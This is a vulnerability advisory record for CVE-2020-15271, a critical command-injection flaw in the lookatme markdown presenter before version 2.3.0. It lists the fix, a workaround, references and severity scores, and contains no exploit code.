CVE-2020-15271

CRITICAL

lookatme < 2.3.0 - OS Command Injection via Markdown Rendering

Title source: llm
STIX 2.1

Description

In lookatme (python/pypi package) versions prior to 2.3.0, the package automatically loaded the built-in "terminal" and "file_loader" extensions. Users that use lookatme to render untrusted markdown may have malicious shell commands automatically run on their system. This is fixed in version 2.3.0. As a workaround, the `lookatme/contrib/terminal.py` and `lookatme/contrib/file_loader.py` files may be manually deleted. Additionally, it is always recommended to be aware of what is being rendered with lookatme.

References (5)

Core 5
Core References
Exploit, Third Party Advisory x_refsource_misc
https://github.com/d0c-s4vage/lookatme/pull/110
Release Notes, Third Party Advisory x_refsource_misc
https://github.com/d0c-s4vage/lookatme/releases/tag/v2.3.0
Release Notes, Third Party Advisory x_refsource_misc
https://pypi.org/project/lookatme/#history

Scores

CVSS v3 9.3
EPSS 0.0198
EPSS Percentile 78.0%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Details

CWE
CWE-78
Status published
Products (2)
lookatme_project/lookatme < 2.3.0
pypi/lookatme 0 - 2.3.0PyPI
Published Oct 26, 2020
Tracked Since Feb 18, 2026